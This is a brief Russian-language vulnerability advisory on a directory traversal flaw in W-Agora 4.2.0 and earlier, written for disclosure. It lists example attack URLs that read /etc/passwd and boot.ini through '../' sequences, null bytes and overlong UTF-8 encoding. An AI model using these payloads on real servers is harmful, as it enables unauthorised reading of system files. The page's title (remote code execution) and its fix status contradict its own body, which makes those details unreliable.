Удаленное выполнение произвольного кода в W-Agora

Дата публикации:
21.08.2005
Всего просмотров:
1717
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
W-Agora 4.x
Уязвимые версии: W-Agora 4.2.0 и более ранние версии

Описание: Уязвимость позволяет удаленному пользователю просмотреть произвольные файлы на целевой системе.

Пример/Эксплоит:

http://[target]/w-agora/index.php?site=../../../../../../../../boot.ini%00

http://[target]/w-agora/index.php?site=../../../. ./../../../../etc/passwd%00

http://[target]/w-agora/index.php?site=../../../../../../../../etc/passwd

http://[target]/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0
%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0
%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini

http://[target]/w-agora/index.php?sit e=../../../../../../../../boot.ini

URL производителя:http://www.w-agora.net/en/index.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: w-agora 4.2.0 and prior Remote Directory Travel

или введите имя

CAPTCHA